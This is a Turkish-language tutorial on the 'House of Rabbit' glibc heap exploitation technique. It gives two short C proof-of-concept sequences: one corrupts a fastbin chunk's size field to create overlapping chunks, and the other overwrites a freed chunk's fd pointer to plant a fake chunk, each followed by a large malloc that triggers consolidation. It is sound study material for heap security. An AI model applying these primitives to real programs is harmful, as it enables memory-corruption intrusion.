House of Rabbit

Gereksinimler

1. Hızlı bin fd işaretçisini veya boyutunu değiştirme yeteneği: Bu, hızlı bin içindeki bir parçanın ileri işaretçisini veya boyutunu değiştirebileceğiniz anlamına gelir.

2. malloc_consolidate'i tetikleme yeteneği: Bu, ya büyük bir parça ayırarak ya da üst parçayı birleştirerek yapılabilir; bu, yığın parçalarını birleştirmeye zorlar.

Hedefler

1. Üst üste binen parçalar oluşturma: Bir parçanın diğerinin üstüne gelmesini sağlamak, böylece daha fazla yığın manipülasyonu yapılmasına olanak tanımak.

2. Sahte parçalar oluşturma: Yığın işlemleri sırasında sahte bir parçayı meşru bir parça olarak ele alması için ayırıcıyı kandırmak.

Saldırı Adımları

POC 1: Hızlı bin parça boyutunu değiştirme

Amaç: Hızlı bin parçasının boyutunu manipüle ederek üst üste binen bir parça oluşturmak.

• Adım 1: Parçaları Ayır

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x40);  // Allocates another chunk of 0x40 bytes at 0x602050
malloc(0x10);                          // Allocates a small chunk to change the fastbin state

İki adet 0x40 baytlık parça ayırıyoruz. Bu parçalar serbest bırakıldıklarında hızlı kutu listesine yerleştirilecektir.

• Adım 2: Parçaları Serbest Bırak

free(chunk1);  // Frees the chunk at 0x602000
free(chunk2);  // Frees the chunk at 0x602050

We free both chunks, adding them to the fastbin list.

• Adım 3: Parça Boyutunu Değiştir

chunk1[-1] = 0xa1;  // Modify the size of chunk1 to 0xa1 (stored just before the chunk at chunk1[-1])

We change the size metadata of chunk1 to 0xa1. This is a crucial step to trick the allocator during consolidation.

• Adım 4: malloc_consolidate'i tetikle

malloc(0x1000);  // Allocate a large chunk to trigger heap consolidation

Büyük bir parça ayırmak, küçük parçaları hızlı kutuda birleştiren malloc_consolidate fonksiyonunu tetikler. Manipüle edilen chunk1 boyutu, chunk2 ile örtüşmesine neden olur.

Birleştirmeden sonra, chunk1 chunk2 ile örtüşür ve daha fazla istismar olanağı sağlar.

POC 2: fd işaretçisini değiştir

Amaç: Hızlı kutu fd işaretçisini manipüle ederek sahte bir parça oluşturmak.

• Adım 1: Parçaları Ayır

unsigned long* chunk1 = malloc(0x40);  // Allocates a chunk of 0x40 bytes at 0x602000
unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x602050

Açıklama: Yığın için sahte parça oluşturmak amacıyla bir küçük ve bir büyük iki parça ayırıyoruz.

• Adım 2: Sahte parça oluştur

chunk2[1] = 0x31;  // Fake chunk size 0x30
chunk2[7] = 0x21;  // Next fake chunk
chunk2[11] = 0x21; // Next-next fake chunk

chunk2 içine sahte parça meta verisi yazıyoruz, böylece daha küçük parçaları simüle ediyoruz.

• Adım 3: chunk1'i serbest bırak

free(chunk1);  // Frees the chunk at 0x602000

Açıklama: chunk1'i serbest bırakıyoruz, bunu fastbin listesine ekliyoruz.

• Adım 4: chunk1'in fd'sini Değiştir

chunk1[0] = 0x602060;  // Modify the fd of chunk1 to point to the fake chunk within chunk2

Açıklama: chunk1'in ileri işaretçisini (fd) chunk2 içindeki sahte parçamıza işaret edecek şekilde değiştiriyoruz.

• Adım 5: malloc_consolidate'i tetikle

malloc(5000);  // Allocate a large chunk to trigger heap consolidation

Büyük bir parça ayırmak tekrar malloc_consolidate'i tetikler, bu da sahte parçayı işler.

Sahte parça hızlı listeye dahil olur, bu da onu daha fazla istismar için meşru bir parça haline getirir.

Özet

House of Rabbit tekniği, bir hızlı parça boyutunu değiştirerek üst üste binen parçalar oluşturmayı veya sahte parçalar oluşturmak için fd işaretçisini manipüle etmeyi içerir. Bu, saldırganların yığında meşru parçalar oluşturmasına olanak tanır ve çeşitli istismar biçimlerini mümkün kılar. Bu adımları anlamak ve uygulamak, yığın istismar becerilerinizi geliştirecektir.